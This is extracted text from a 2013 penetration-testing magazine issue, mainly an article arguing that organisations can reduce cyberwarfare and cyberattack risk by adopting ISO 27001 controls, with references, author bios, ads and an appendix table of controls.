from a risk-focused client like me, can you profes-
sionally, rationally, and logically defend your claim?
Consultants have told me that sitting across the ta-
ble from me can be very uncomfortable when I start
challenging them about their assigned risk ratings.
In Summary
There is no question that penetration testing, done
well, can be incredibly valuable in helping execu-
tives make well-informed decisions to better man-
age their company’s risk landscape. A pen test,
however, can be worse than useless if it results
in wasted resources and unnecessary business
impact. The difference often hinges on the critical
thinking you apply when interpreting test results.
JACK JONES
Jack Jones has worked in technology for thirty years, spe-
cializing in information security and risk management for
twenty-four of those years. During that time he’s worked as
a pen tester, written viruses (restricted to laboratory envi-
ronments) and keystroke loggers, and disassembled mal-
ware as a hobby. He’s also been a CISO for three diferent
companies, including a Fortune 100 insurance company, a
bank, and a consumer information bureau. Based on the les-
sons he learned dealing with executives as a CISO, Jack shift-
ed his focus from being a “hacker of technology” to being a
“hacker of risk”, leading him to develop the Factor Analysis
of Information Risk (FAIR) framework for measuring risk. He
is currently co-founder and President of CXOWARE, Inc.

Cyber Security Industry Transaction Map 2004-2013
Our Role
Delling Advisory is a boutique advisory
firm, providing merger and acquisition
related consulting, advisory and
transactional services to companies in the
information security industry.
Our Advantage
We have unsurpassed industry knowledge
built through a successful career in the
information security market in Australia,
and as a principal in transactions buying,
merging, and selling companies in the
information security industry.
www.dellingadvisory.com
www.dellingadvisory.com/blog (Research)
WAR CAMP
32 http://pentestmag.com Page OPEN 05/2013
O
ne of the main disadvantages of the hy-
per-connected world of the 21
st
century is
the very real danger that countries, orga-
nizations, and people who use networks comput-
er resources connected to the Internet face be-
cause they are at risk of cyberattacks that could
result in anything ranging from denial service, to
espionage, theft of confidential data, destruction
of data, and/or destruction of systems and ser-
vices. As recognition of these dangers, national
leaders, business leaders, and the military lead-
ers of most modern countries are now acknowl-
edging that the potential and likely eventuality of
cyberwar is very real. This article will introduce
come concepts about the realities and weapons
of cyberwarfare and discuss how an organization
can use a security compliance framework of con-
trols to mitigate the risks of cyberattacks and cy-
berwarfare.
The Simple Truths of this Article
1. Cyberwar is coming or could be already here.
All the signs and news media coverage and
publicly known actions of the U.S. Government
confrm it
2. If you use have an IT infrastructure that is im-
portant to your business operations, you need
to protect your business from Cyberattacks
and Cyberwarfare
3. There are many things you can do, and things
you cannot legally do if you are in the United
States, to protect your business from Cyber-
attacks and Cyberwarfare. Restrictions inside
the U.S. Code, Title 10, and other various cy-
ber legislation strictly prohibit retaliation or go-
ing on the offensive. But you can prepare and
protect yourself from cyberattacks.
4. In any organization, Management Support is
required to understand and allocate the re-
sources to defend against cyberattacks.
5. Understanding risk identifcation, threats, vul-
nerabilities, controls, performing risk assess-
ment, and risk management are essential to
becoming an effective protector of IT assets.
6. Because of the complex nature of most IT infra-
structures and assets and how they integrate
with an organization’s business operations, it is
better to use some type of proven framework
with which to assure that all the important as-
pects of compliance and infrastructure securi-
ty have meet address and are being measured.
Cyberwar Concepts
Cyberattacks and cyberwarfare tactics, by some
expert estimates, date back to the early 1980s
Applying a Security
Compliance Framework to Prepare Your Organization for
Cyberwarfare and Cyberattacks
On Monday, CNN posted a web article with this headline, Nations
Prepare for Cyberwar, describing the inevitability of a cyberwar
that is coming or is possibly already here (Goldman, 2013).
33 http://pentestmag.com Page OPEN 05/2013
when there was a set of suspicious explosions that
were likely generated in control systems on some
pipelines in Asia, though this has never been con-
clusively confirmed. However, the idea of using
computers and software to attack another entity
via networks dates back to the early 2000s and by
some accounts, well before that. The diagram from
Lewis University shows a brief graphic history be-
tween 2000 and 2009.
Cyberweapons That We Know About
Cyberattacks and cyberwarfare tactics have typi-
cally been in the realm of Distributed Denial of Ser-
vice (DDoS) attacks with some more sophisticated
attacks as shown in the Technolytics diagram be-
low (Figure 2).
Since 2007, as the existence of well-orchestrat-
ed cyberwar attacks such as the DDoS attacks
on Estonia (2007), Georgia (2008), and Kyrgyz-
stan (2009), as well as the Stuxnet (2010), Duqu
(2011), and Flame (2012) have all become known
to the world through security researchers, their vic-
tims, and the media. As a result, it has become ap-
parent most who are watching this area that cyber-
space has now become the new realm onto which
the field of international conflict has been extend-
ed, and that cyberwarfare is now no longer a theo-
retical issue that could one day threaten those par-
Figure 1. A Brief History of Cyberwarfare by Lewis University,
Romeoville, IL
Figure 2. Classes of Cyberweapon Capabilities, by
Technolytics
WAR CAMP
34 http://pentestmag.com Page OPEN 05/2013
ticipants and systems that rely upon connections
to the Internet and Internet-connected networks.
Unfortunately however, despite the emergence of
a new breed of intelligent cyberweapons (i.e. Stux-
net, Flame, Duqu, and Shamoon) with the ability
to strike with precision and accuracy, the pres-
ent findings and research on cyberwarfare related
events shows that the U.S. is playing catch-up and
doing so badly (Turanski and Husick, 2012).
The diagram below shows the rapid evolution of
cyberweapons over time. It is obvious that accord-
ing to this diagram, starting in about 2008, until
what is predicted to be about 2020, the evolution of
the sophistication of cyberweapons will be be quite
significant. This rapid rise in sophistication and ca-
pabilities of cyberweapons, coupled with their rela-
tive ease of use, proliferation and economic ben-
efit, will make these weapons very compelling for
military and strategic use, and make the likelihood
of cyberwar increasingly significant for the fore-
seeable future (Figure 3).
Who Is the “Enemy” or the “Adversary?”
In the world of cyberattacks and cyberwarfare, the
issue of who your adversary usually depended on
your perspective. From the perspective of the U.S.
and its allies, the adversary usually falls into one of
these five categories: Russia, China, North Korea,
Iran, or non-state actors. Much is already known
about our potential adversaries, such as Russia,
China, North Korea and Iran, but what is perhaps
less understood is the degree to which they have
been successful in integrating cyberwarfare and
cyberdeterrence capabilities into their own nation-
al war plans. Nevertheless, due to the previous ex-
tensive experience of China, Russia and the U.S.
with strategic war planning, it is more likely that
each of these countries stand the greatest chance
of making integrating cyberwarfare and cyber-
deterrence capabilities into their respective war
plans. Yet, as far back as June 2009, it was clear
that the U.S. and Russia were unable to agree on
a treaty that would create the terms under which
cyberwarfare operations could and would be con-
ducted (Markoff, J. and Kramer, A. E., 2009).
DDoS as a Service, as low as US$20 Per
Hour
We now live in a world where the Internet and mal-
ware have made it possible to buy services such
as DDoS attacks against an enemy or a competitor
for prices as low as $20 hour. When you consid-
er the implications of this idea, the economic will
make the idea of tactical cyberattacks more ap-
pealing to organizations. I know some of the URLs
where these services are available, but rather than
give them advertisement, I would just invite you to
do an Internet search using your favorite search
engine.
What Is an ISMS?
The fast-paced, electronically-enabled business
environment of the 21
st
century is characterized
by the tactical and strategic uses of information
as business enablers. In practically every orga-
nization, information is now seen as a primary
asset and as such, it must be protected. Yet the
proliferation and reliance on information in an
organization also introduces responsibilities and
risks which if not addressed, can subject the or-
ganization to extraordinary risks that could se-
verely impact the viability of the business. The
best strategy for an organization to manage
these new business realities is to adopt a strong
compliance management posture in the area of
Information Security to ensure that its informa-
tion assets are protected in the most compre-
hensive, standardized manner possible. Pres-
ently, the best tool to manage the challenges of
Information Security is an enterprise Information
Security Management System (ISMS). The ISMS
is a centralized system of policies, procedures,
and guidelines that when created and uniformly
applied will provide the best practices to help en-
sure that an organization’s Information Security
is being managed in a standardized way using
documented best practices. The introduction of
an ISMS into an organization’s business opera-
tions will serve to identify, document and clas-
Figure 3. Evolution of Cyberweapon Capabilities, 1994 –
2020, by Technolytics
35 http://pentestmag.com Page OPEN 05/2013
Figure 4. Risk relationship diagram, from ISO27001.org
Figure 5. Relationships between IT security management controls, Threats and Assets
(Exposures), Jaquith, 2007
WAR CAMP
36 http://pentestmag.com Page OPEN 05/2013
sify information assets and risks and then docu-
ment the mitigation of risks using established,
documented controls. When an organization has
chosen the standardized ISO 27001 Security
Management Framework the key benefits to im-
plementing an ISMS would be:
• The implementation of a standardized Informa-
tion Security Management System into the or-
ganization
• Better management and fulfllment of the Infor-
mation Security requirements from the organi-
zation’s Clients
• Reduction of risks related to cyberattacks and
cyberwarfare
• Reduction of risk of loss of existing customers
• Increased opportunities for new business
• Reduction of risk to regulatory penalties
• Reduction of risk reputational damage
• The creation of an Information Security-aware
culture at the organization
• Enabling ISO27001-compliant offces to com-
municate and conduct business in areas af-
fected by Information Security in a standard
way
• Better management of IT assets and their as-
sociated risks
• The ability to have an Information Securi-
ty Management System that is based on the
Deming model of Plan – Do – Check – Act for
continuous process improvement
• The adoption of the most widely recognized in-
ternal standard for implementing an ISMS
Note that the Information Security has rapidly ris-
en to the forefront as a serious business issue.
Because of its rapid rise to prominence and the
dynamic and evolving nature of threats and the
associated risk management efforts, the models
to measure and quantify the value of such proj-
ects can often seem frustrating at best. So while
this ISMS project may diffcult to quantify using
traditional methods such as return on investment,
it is clear that the benefts of continued customer
relationships as well as the ability to attract future
customers through a demonstrated strong and
continually improving posture of Information Se-
curity compliance management will far outweigh
the costs associated with an ISO 27001project.
Indeed, after implementing the ISMS under ISO
27001 standards, an organization will have better
control of the Information that is the lifeblood of its
business, and it will be able to demonstrate to its
customers and its business partners that it too has
adopted a strong posture of compliance in the area
of Information Security.
What is ISO 27001?
ISO 27001 is an international standard with 133
controls in 11 domains which provide structured
standard for the creation of an Information Securi-
Figure 6. A Fast-track ISMS Implementation Project Timeline, William Slater, 2012
37 http://pentestmag.com Page OPEN 05/2013
ty Management System based on strongly focused
risk management and continuous process im-
provement under the Plan – Do – Check- Act mod-
el. The present version was developed in 2005 and
an updated version is expected to be published by
ISO sometime in 2013. This version is predicted
to have several additions that will focus on Cloud
Computing and also standardized IT services and
service management as described under ITIL and
ISO 20000. In fact, in October 2012, the ISO 27013
standard was published and it demonstrates how
to integrate an ISO 2000 – based Service Manage-
ment System with an ISO 27001-based Informa-
tion Security Management System.
What Cyberattack / Cyberwarfare Risk
Remediation Project Using ISO 27001
Might Look Like
It is possible to create and implement an ISMS us-
ing a fast-track method as shown in figure 6 below.
Note that management must support such a proj-
ect in terms of resources (monetary, people, and
assets) and politically in order for it to be success-
ful. Nevertheless, it is possible to accomplish such
a project if management and the project team have
the will and resources to succeed.
Should You Get Your Organization
Certified in ISO 27001?
Should you get your organization certified in ISO
27001 if you make the effort to remediate your
cyberattack and cyberwarfare risks using an ISO
27001 ISMS control framework? The quick answer
is, it depends. Currently, there are less than 9000
ISO 27001 ISMS certificate holders worldwide. De-
spite the apparent emphasis on security and risk
reduction, quite often, organizations will pursue
the ISO 27001 certification either to comply with
regulatory requirements (as is required in India),
or as a business enabler, because their business
partners and/or customers expect it or have great-
er confidence in an organization that has an ISO
27001 certification. Though is not easy or inexpen-
sive in terms of resources to earn or maintain and
ISO 27001 certification, the return on investment,
particularly in areas like the North America and
South America where the ISO 27001 certification
is still relatively rare, can be quite significant.
Figure 7 below shows the numbers of ISO 27001
ISMS Certificate Registrants by continent as of
2011. Note that according the PECB, a certification
body that trains and certifies ISO 27001 implement-
ers and auditors, the number of ISO 27001 ISMS
Certificate Registrants is expected to double each
year in North America for the foreseeable future.
Is Compliance with the ISO 27001
Standard or Some Other Security
Compliance Framework Still Important
Even If Your Organization Doesn’t Get
Certified?
Personally, I believe that the chief responsibility of
the leadership of organization is to recognize risks
and reduce them, as cost effectively as possible
to manageable levels, and to comply with the laws
and regulations that impact its operating environ-
ment. Even if an organization does not seek or
achieve a certification under a security compliance
standard such as ISO 27001, the organization can
embrace and comply with the security controls of a
security compliance standard, and thereby signifi-
cantly reduce its business and security risks. The
value in each of these security compliance frame-
works (i.e. ISO 27001, PSC DSS. FISMA, HIPAA,
etc.) is that each offers a set of well defined con-
trols that are structured in a way to allow the orga-
nization that adopts then to visibly demonstrate its
efforts to reduce risks to its assets and its operat-
ing environment.
Mapping to Achieve Compliance with Two
or More Security Compliance Frameworks
When an organization is required to comply with
two or more security compliance frameworks, a
process known as “mapping” using a table show-
ing the similarity of various controls is used to un-
derstand and communicate the specific controls of
each standard, and usually on a one to one basis.
Typically, the standard that is already in place or
the one that is the most familiar is represented on
Figure 7. ISO 27001 ISMS Registrants by Continent as of 2011
(source unknown)
WAR CAMP
38 http://pentestmag.com Page OPEN 05/2013
the left column, and the newer standard that is re-
quired for a new compliance initiative is located on
the right column. An example is shown in figure 8
below.
Using ISO 27001 Controls to Defend
Against Cyberwarfare and Cyberattacks
Of the 133 controls defined in Annex A of the ISO
27001 standard, not all of these are required to re-
duce the risk of cyberattacks and cyberwarfare.
However, using my knowledge of the ISO 27001
standard framework of 133 controls, and my knowl-
edge of the various characteristics and aspects of
cyberattacks and cyberwarfare, I created the table
in Appendix A that can be used to understand how
these various defined controls can be used to miti-
gate the risks associated with cyberattacks and cy-
berwarfare. The right-most column gives a simple
yes or no to indicate the usefulness of the control
in the mitigation of risks associated with cyberat-
tacks and cyberwarfare.
Recommendations
The section has been divided into recommenda-
tions for four distinct groups of people that will prob-
ably comprise the population of this magazine’s
readers. I deliberately omitted government officials
and military officials because they have their own
elite teams of cyberwarfare experts to advise them
on these issues. In addition, they have a perspec-
Figure 8. Mapping ISO 27001 Annex A controls to NIST 800-53 Controls (FISMA)
39 http://pentestmag.com Page OPEN 05/2013
tive of cyberattacks and cyberwarfare in which
they must consider battle plans and strategies that
include both offensive and defensive operations.
To best understand the true nature of cyberdeter-
rence and cyberwarfare, everyone would be well
advised to read many of the materials in the refer-
ence section of this article, and in particular, read
Martin Libicki’s book, Cyberdeterrence and Cyber-
war, because I consider it to be the best unclassi-
fied reference on the market.
For IT Professionals
• Educate yourself, continually about Cyberwarfare.
• Stay abreast of the threats and vulnerabilities
associated with your infrastructure and the in-
formation technologies that you work with.
• Stay abreast of the security controls required
to mitigate the risks associated with the infor-
mation technologies that you work with.
• Where possible, get professional training and
certifcations associated with IT security and
your job positions.
For IT Managers
1. Learn the security compliance standard or stan-
dards that will enable you to help your organiza-
tion effectively lower risk to acceptable levels.
2. Learn risk management in the IT world.
3. Learn what your teams do and keep them mo-
tivated to be the best at what they do.
For Executives and Business Owners
• Remember your responsibilities to the Board of
Directors, your shareholders and other stake-
holders in your organization: Cyberattacks and
cyberwarfare represent serious threats that can
obliterate an organization’s ability to function (see
the 2007 cyberattacks in Estonia, or the 2008 at-
tacks in Georgia if you require more proof). If you
plan for your organization to be an ongoing con-
cern for the foreseeable future, you have no al-
ternative than to ensure it is protected from cy-
berattacks and the effects of cyberwarfare.
• Learn the security compliance standard or stan-
dards that will enable you to help your organiza-
tion effectively lower risk to acceptable levels.
• Learn risk management in the IT world.
• Learn what your managers and your teams
do and keep them motivated to be the best at
what they do.
For Hackers
• Consider becoming legitimate because the need
for experienced cybersecurity professionals to
defend organizations and countries has never
been greater and in the long run, the compensa-
tion will probably be much more lucrative.
• Make sure that if you do join a team that it is a
winning team.
Conclusions
This article has covered some of the better known
aspects of cyberattacks and cyberwarfare, and at-
tempted to show that risks can be managed by ap-
plying security compliance frameworks such as ISO
27001. While this has only been an introduction, be-
cause scores of books have been written on these
topics since 2005, it is important to understand
these basic concepts and take them seriously. The
future of your business, the satisfaction and confi-
dence of your stakeholders, business partners, and
your customers all depend on your ability to protect
your business and its operations capabilities in the
day and age of cyberattacks and cyberwarfare.
Resources
• Bousquet, A. (2009). The Scientifc Way of Warfare: Order and
Chaos on the Battlefelds of Modernity. New York, NY: Columbia
University Press.
• Brewer, D. and Nash, M. (2010). Insights into the ISO/IEC 27001
Annex A. A paper written published by Dr. David Brewer and
Dr. Michael Nash to explain ISO 27001 and Risk Reduction in
Organizations. Retrieved from http://www.gammassl.co.uk/
research/27001annexAinsights.pdf on March 10, 2011.
• Bush, G. W. (2008). Comprehensive National Cybersecurity Initiative
(CNCI). Published by the White House January 2008. Retrieved
from http://www.whitehouse.gov/cybersecurity/comprehensive-
national-cybersecurity-initiative on January 5, 2012.
• Calder, A. and Watkins, S. (2012). IT Governance: An International
Guide to Data Security and ISO27001/ISO27002, 5th edition.
London, U.K.: IT Governance Press.
• Carr, J. (2012). Inside Cyber Warfare, second edition. Sebastopol,
CA: O’Reilly.
• Clarke, R. A. and Knake, R. K. (2010). Cyberwar: the Next Threat
to National Security and What to Do About It. New York, NY:
HarperCollins Publishers.
• Crosston, M. (2011). World Gone Cyber MAD: How “Mutually
Assured Debilitation” Is the Best Hope for Cyber Deterrence. An
article published in the Strategic Studies Quarterly, Spring 2011.
Retrieved from http://www.au.af.mil/au/ssq/2011/spring/crosston.pdf
on October 10, 2012.
• Czosseck, C. and Geers, K. (2009). The Virtual battlefeld:
Perspectives on Cyber Warfare. Washington, DC: IOS Press.
• Edwards, M. and Stauffer, T. (2008). Control System Security
Assessments. A technical paper presented at the 2008 Automation
Summit – A Users Conference, in Chicago. Retrieved from http://
www.infracritical.com/papers/nstb-2481.pdf on December 20, 2011.
• Fayutkin, D. (2012). The American and Russian Approaches to
Cyber Challenges. Defence Force Offcer, Israel. Retrieved from
http://omicsgroup.org/journals/2167-0374/2167-0374-2-110.pdf on
September 30, 2012.
WAR CAMP
40 http://pentestmag.com Page OPEN 05/2013
• Freedman, L. (2003). The Evolution of Nuclear Strategy. New York,
NY: Palgrave Macmillan.
• Gerwitz, D. (2011). The Obama Cyberdoctrine: tweet softly, but
carry a big stick. An article published at Zdnet.com on May 17,
2011. Retrieved from http://www.zdnet.com/blog/government/the-
obama-cyberdoctrine-tweet-softly-but-carry-a-big-stick/10400 on
September 25, 2012.
• Gjelten, T. (2010). Are ‘Stuxnet’ Worm Attacks Cyberwarfare? An
article published at NPR.org on October 1, 2011. Retrieved from
http://www.npr.org/2011/09/26/140789306/security-expert-u-s-
leading-force-behind-stuxnet on December 20, 2011.
• Gjelten, T. (2010). Stuxnet Computer Worm Has Vast Repercussions.
An article published at NPR.org on October 1, 2011. Retrieved from
http://www.npr.org/templates/story/story.php?storyId=130260413 on
December 20, 2011.
• Gjelten, T. (2011). Security Expert: U.S. ‘Leading Force’ Behind
Stuxnet. An article published at NPR.org on September 26, 2011.
Retrieved from http://www.npr.org/2011/09/26/140789306/security-
expert-u-s-leading-force-
• behind-stuxnet on December 20, 2011.
• Gjelten, T. (2011). Stuxnet Raises ‘Blowback’ Risk In Cyberwar. An
article published at NPR.org on December 11, 2011. Retrieved from
http://www.npr.org/2011/11/02/141908180/stuxnet-raises-blowback-
risk-in-cyberwar on December 20, 2011.
• Goldman, D. (2013). Nations prepare for cyber war. An article
published at CNN on January 7, 2013. Retrieved from http://
money.cnn.com/2013/01/07/technology/security/cyber-war/index.
html?hpt=hp_c3 on January 7, 2013.
• Hagestad, W. T. (2012). 21st Century Chinese Cyberwarfare.
Cambridgeshire, U.K.: IT Governance.Hyacinthe, B. P. (2009).
Cyber Warriors at War: U.S. National Security Secrets & Fears
Revealed. Bloomington, IN: Xlibris Corporation.
• ISO. (2005) “Information technology – Security techniques –
Information security management systems requirements”, ISO/IEC
27001:2005. Retrieved from http://www.ansi.org on February 1, 2011.
• Jaquith, A. (2007). Security Metrics. Boston, MA: Addison Wesley.
• Kaplan, F. (1983), The Wizards of Armageddon: The Untold Story of
a Small Group of Men Who Have Devised the Plans and Shaped
the Policies on How to Use the Bomb. Stanford, CA: Stanford
University Press.
• Kerr, D. (2012). Senator urges Obama to issue ‘cybersecurity’
executive order. An article published at Cnet.com on September
24, 2012. Retrieved from http://news.cnet.com/8301-1009_3-
57519484- 83/senator-urges- obama-to-i ssue-cybersecuri t y-
executive-order/ on September 26, 2012.
• Kramer, F. D. (ed.), et al. (2009). Cyberpower and National Security.
Washington, DC: National Defense University.
• Langer, R. (2010). A Detailed Analysis of the Stuxnet Worm.
Retrieved from http://www.langner.com/en/blog/page/6/ on
December 20, 2011.
• Libicki, M.C. (2009). Cyberdeterrence and Cyberwar. Santa Monica,
CA: Rand Corporation.
• Markoff, J. and Kramer, A. E. (2009). U.S. and Russia Differ on a
Treaty for Cyberspace. An article published in the New York Times on
June 28, 2009. Retrieved from http://www.nytimes.com/2009/06/28/
world/28cyber.html?pagewanted=all on June 28, 2009.
• Mayday, M. (2012). Iran Attacks US Banks in Cyber War: Attacks
target three major banks, using Muslim outrage as cover. An article
published on September 22, 2012 at Poltix.Topix.com. Retrieved
from http://politix.topix.com/homepage/2214-iran-attacks-us-banks-
in-cyber-war on September 22, 2012.
• McBrie, J. M. (2007). THE BUSH DOCTRINE: SHIFTING POSITION
AND CLOSING THE STANCE. A scholarly paper published by the
USAWC STRATEGY RESEARCH PROJECT. Retrieved from http://
www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA423774 on September 30,
2012.
• Obama, B. H. (2012). Defense Strategic Guidance 2012 – Sustaining
Global Leadership: Priorities for 21st Century Defense. Published
January 3, 2012. Retrieved from http://www.defense.gov/news/
Defense_Strategic_Guidance.pdf on January 5, 2012.
• Obama, B.H. (2011). INTERNATIONAL STRATEGY for Cyberspace.
Published by the White House on May 16, 2011. Retrieved
from http://www.whitehouse.gov/sites/default/fles/rss_viewer/
international_strategy_for_cyberspace.pdf on May 16, 2011.
• Payne, K. B. (2001). The Fallacies of Cold War Deterrence and a
New Direction. Lexington, KY: The University of Kentucky Press.
• Pry, P. V. (1999). War Scare: Russia and America on the Nuclear
Brink. Westport, CT: Praeger Publications.
• Radcliff, D. (2012). Cyber cold war: Espionage and warfare. An
article published in SC Magazine, September 4, 2012. Retrieved
from http://www.scmagazine.com/cyber-cold-war-espionage-and-
warfare/article/254627/ on September 7, 2012.
• Saini, M. (2012). Preparing for Cyberwar – A National Perspective.
An article published on July 26, 2012 at the Vivikanda International
Foundation. Retrieved from http://www.vifndia.org/article/2012/
july/26/preparing-for-cyberwar-a-national-perspective on October
14, 2012.
• Sanger, D. E. (2012). Confront and Coneal: Obama’s Secret Wars
and Surprising Use of America Power. New York, NY: Crown
Publishers.
• Schmidt, H. S. (2006). Patrolling Cyberspace: Lessons Learned from
Lifetime in Data Security. N. Potomac, MD: Larstan Publishing, Inc.
• Schmitt, E. and Shanker, T. (2011). U.S. Debated Cyberwarfare
in Attack Plan on Libya. An article published in the New York
Times on October 17, 2011. Retrieved from http://www.nytimes.
com/2011/10/18/world/africa/cyber-warfare-against-libya-was-
debated-by-us.html on October 17, 2011.
• Slater, W. F. (2013). ISO 27001 Resource Page. Retrieved from
http://billslater.com/iso27001 on January 12, 2013.
• Stiennon, R. (2010). Surviving Cyber War. Lanham, MA: Government
Institutes.
• Strohm, C. and Engleman, E. (2012). Cyber Attacks on U.S. Banks
Expose Vulnerabilities. An article published at BusinessWeek.com
on September 28, 2012. Retrieved from http://www.businessweek.
com/news/2012-09-27/cyber-attacks-on-u-dot-s-dot-banks-expose-
computer-vulnerability on September 30, 2012.
• Technolytics. (2012). Cyber Commander’s eHandbook: The
Weaponry and Strategies of Digital Confict, third edition.
Purchased and downloaded on September 26, 2012.
• The ISO 27000 Directory. (2012). An Introduction to ISO 27001, ISO
27002....ISO 27008. Retreived from http://www.27000.org/index.
htmhttp://idcontent.bellevue.edu/content/CIT/cyber/615/compliance
on December 7, 2012.
• Turzanski, E. and Husick, L. (2012). “Why Cyber Pearl Harbor Won’t
Be Like Pearl Harbor At All...” A webinar presentation held by the
Foreign Policy Research Institute (FPRI) on October 24, 2012.
Retrieved from http://www.fpri.org/multimedia/2012/20121024.
webinar.cyberwar.html on October 25, 2012.
• U.S. Army. (1997). Toward Deterrence in the Cyber Dimension: A
Report to the President’s Commission on Critical Infrastructure
Protection. Retrieved from http://www.carlisle.army.mil/DIME/
documents/173_PCCIPDeterrenceCyberDimension_97.pdf on
November 3, 2012.
• U.S. Department of Defense, JCS. (2006). Joint Publication (JP)
5-0, Joint Operation Planning, updated on December 26, 2012.
Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp5_0.pdf on
October 25, 2012.
• Waters, G. (2008). Australia and Cyber-Warfare. Canberra, Australia:
ANU E Press.
WILLIAM F. SLATER, III
William F. Slater, III is an IT securi-
ty professional who lives and works
in Chicago, IL. He has over 20-securi-
ty related certifcations, including a
CISSP, SSCP, and a CISA certifcation.
In March 2013 he completes his M.S.
in Cybersecurity Program at Bellev-
ue University in Bellevue, Nebraska.
He has written numerous articles on IT
Security and Cyberwarfare. Mr. Slater is also an adjunct
professor at the Illinois Institute of Technology and the
devoted husband of Ms. Joanna Roguska, who is a web
developer and a native of Warsaw, Poland. You can read
more about Mr. Slater at http://billslater.com/interview.
Appendix A – ISO27001 Domains, Control Objectives and Controls
ISO 27001:2005 Controls
Clause Section Control Objective/Control
Does It Apply
to Defending
Against
Cyberattacks and
Cyberwarfare?
Security Policy
5.1 Information Security Policy
5.1.1 Information Security Policy Document Yes
5.1.2 Review of Information Security Policy No

   
Organization of
Information security
6.1 Internal Organization
6.1.1 Management Commitment to information security Yes
6.1.2 Information security Co-ordination No
6.1.3 Allocation of information security Responsibilities Yes
6.1.4 Authorization process for Information Processing facilities No
6.1.5 Confdentiality agreements No
6.1.6 Contact with authorities No
6.1.7 Contact with special interest groups No
6.1.8 Independent review of information security No
6.2 External Parties
6.2.1 Identifcation of risk related to external parties No
6.2.2 Addressing security when dealing with customers No
6.2.3 Addressing security in third party agreements No

   
Asset Management
7.1 Responsibility for Assets
7.1.1 Inventory of assets Yes
7.1.2 Ownership of Assets Yes
7.1.3 Acceptable use of assets Yes
7.2 Information classifcation
7.2.1 Classifcation Guidelines Yes
7.2.2 Information Labeling and Handling Yes

   
Human Resource
Security
8.1 Prior to Employment
8.1.1 Roles and Responsibilities Yes
8.1.2 Screening Yes
8.1.3 Terms and conditions of employment No
8.2 During Employment
8.2.1 Management Responsibility Yes
8.2.2 Information security awareness, education and training Yes

8.2.3 Disciplinary process No
8.3 Termination or change of employment
8.3.1 Termination responsibility No
8.3.2 Return of assets Yes
8.3.3 Removal of access rights Yes

   
Physical and
Environmental
Security
9.1 Secure Areas
9.1.1 Physical security Perimeter Yes
9.1.2 Physical entry controls Yes
9.1.3 Securing ofces, rooms and facilities Yes
9.1.4 Protecting against external and environmental threats Yes
9.1.5 Working in secure areas Yes
9.1.6 Public access, delivery and loading areas Yes
9.2 Equipment security
9.2.1 Equipment sitting and protection Yes
9.2.2 Support utilities Yes
9.2.3 Cabling security No
9.2.4 Equipment Maintenance No
9.2.5 Security of equipment of-premises Yes
9.2.6 Secure disposal or reuse of equipment Yes
9.2.7 Removal of Property Yes

Communications
and Operations
Management
10.1 Operational Procedures and responsibilities
10.1.1 Documented operating Procedures Yes
10.1.2 Change Management Yes
10.1.3 Segregation of Duties Yes
10.1.4 Separation of development and Operations facilities Yes
10.2 Third Party Service Delivery Management
10.2.1 Service Delivery No
10.2.2 Monitoring and review of third party services No
10.2.3 Manage changes to the third party services No
10.3 System Planning and Acceptance
10.3.1 Capacity management Yes
10.3.2 System acceptance Yes
10.4 Protection against Malicious and Mobile Code
10.4.1 Controls against malicious code Yes
10.4.2 Controls against Mobile code Yes
10.5 Back-Up
10.5.1 Information Backup Yes
10.6 Network Security Management
10.6.1 Network controls Yes
10.6.2 Security of Network services Yes
10.7 Media Handling
10.7.1 Management of removable media Yes
10.7.2 Disposal of Media Yes
10.7.3 Information handling procedures Yes
10.7.4 Security of system documentation Yes
10.8 Exchange of Information
10.8.1 Information exchange policies and procedures Yes
10.8.2 Exchange agreements Yes
10.8.3 Physical media in transit Yes
10.8.4 Electronic Messaging Yes
Communications
and Operations
Management
10.8.5 Business Information systems Yes
10.9 Electronic Commerce Services
10.9.1 Electronic Commerce Yes
10.9.2 On-Line transactions Yes
10.9.3 Publicly available information Yes
10.1 Monitoring
10.10.1 Audit logging Yes
10.10.2 Monitoring system use Yes
10.10.3 Protection of log information Yes
10.10.4 Administrator and operator logs Yes
10.10.5 Fault logging Yes
10.10.6 Clock synchronization Yes

   
12.4.3 Access control to program source library Yes
12.5 Security in Development & Support Processes
12.5.1 Change Control Procedures Yes
12.5.2 Technical review of applications after Operating system changes Yes
12.5.3 Restrictions on changes to software packages Yes
12.5.4 Information Leakage Yes
12.5.5 Outsourced Software Development Yes
12.6 Technical Vulnerability Management
12.6.1 Control of technical vulnerabilities Yes

   
Information
Security Incident
Management
13.1 Reporting Information Security Events and Weaknesses
13.1.1 Reporting Information security events Yes
13.1.2 Reporting security weaknesses Yes
13.2 Management of Information Security Incidents and Improvements
13.2.1 Responsibilities and Procedures Yes
13.2.2 Learning for Information security incidents Yes
13.2.3 Collection of evidence Yes
   
Business Continuity
Management
14.1 Information Security Aspects of Business Continuity Management
14.1.1
Including Information Security in Business continuity manage-
ment process
Yes
14.1.2 Business continuity and Risk Assessment Yes
14.1.3
developing and implementing continuity plans including informa-
tion security
Yes
14.1.4 Business continuity planning framework Yes
14.1.5 Testing, maintaining and re-assessing business continuity plans Yes

   
Compliance
15.1 Compliance with Legal Requirements
15.1.1 Identifcation of applicable legislations Yes
15.1.2 Intellectual Property Rights ( IPR) Yes
15.1.3 Protection of organizational records Yes
15.1.4 Data Protection and privacy of personal information Yes
15.1.5 Prevention of misuse of information processing facilities Yes
15.1.6 Regulation of cryptographic controls Yes
15.2
Compliance with Security Policies and Standards and Technical
compliance
15.2.1 Compliance with security policy Yes
15.2.2 Technical compliance checking Yes
15.3 Information System Audit Considerations
15.3.1 Information System Audit controls Yes
15.3.2 Protection of information system audit tools Yes





Renub Research is a leading Management Consultancy and Market Research Company. We have
more than 10 years of experience in Research, Survey and Consulting. We partner with clients in all
sectors and regions to identify their highest-value opportunities, address their most critical challenges,
and transform their businesses. Our core team is comprised of an experienced people holding
graduate, post graduate and Ph.D. degrees. We support many blue chip companies by providing them
findings and perspectives across a wide range of markets.

Renub Research - Technology Reports (Recently Published)

South Africa Mobile Service Market, Subscribers & Companies Forecast to 2015

Private Cloud Computing Market & Forecast to 2015: Worldwide Analysis

India E-Retail (E-Tailing) Market, Companies Revenue Analysis & Forecast to 2015

Mobile Payment Market, Users Worldwide & Countries Forecast to 2014

India Smartphone Market & Operating System Analysis Forecast

4G (LTE and WiMAX) Service Revenue/Market Analysis and its Opportunities for Industries

Semiconductor Industry Market Analysis & Future Trends Worldwide (2010 – 2013)

China Business Process Outsourcing (BPO) Market 2011 & Cities Outsourcing Analysis

